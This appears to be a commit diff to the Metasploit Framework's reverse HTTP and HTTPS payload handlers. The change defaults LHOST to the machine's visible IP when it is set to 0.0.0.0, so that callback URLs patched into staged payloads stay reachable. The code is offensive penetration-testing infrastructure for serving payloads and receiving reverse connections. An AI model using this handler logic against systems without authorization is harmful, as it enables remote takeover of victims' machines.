Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used

git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2011-09-23 17:04:24 +00:00
parent 4d850c1ee6
commit 616913c4c1
2 changed files with 20 additions and 5 deletions

View File

@ -123,13 +123,21 @@ protected
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
if lhost.empty? or lhost == '0.0.0.0'
lhost = Rex::Socket.source_address(cli.peerhost)
end
# Process the requested resource. # Process the requested resource.
case req.relative_resource case req.relative_resource
when /^\/INITJM/ when /^\/INITJM/
print_line("java: #{req.relative_resource}") print_line("Java: #{req.relative_resource}")
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
print_line "URL: #{url.inspect}" print_line "URL: #{url.inspect}"
blob = "" blob = ""
@ -178,7 +186,7 @@ protected
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256)) i = blob.index("https://" + ("X" * 256))
if i if i
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
blob[i, url.length] = url blob[i, url.length] = url
end end
print_status("Patched URL at offset #{i}...") print_status("Patched URL at offset #{i}...")

View File

@ -124,11 +124,18 @@ protected
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
if lhost.empty? or lhost == '0.0.0.0'
lhost = Rex::Socket.source_address(cli.peerhost)
end
# Process the requested resource. # Process the requested resource.
case req.relative_resource case req.relative_resource
when /^\/INITJM/ when /^\/INITJM/
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
#$stdout.puts "URL: #{url.inspect}" #$stdout.puts "URL: #{url.inspect}"
blob = "" blob = ""
@ -176,7 +183,7 @@ protected
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256)) i = blob.index("https://" + ("X" * 256))
if i if i
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00" url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
blob[i, url.length] = url blob[i, url.length] = url
end end
print_status("Patched URL at offset #{i}...") print_status("Patched URL at offset #{i}...")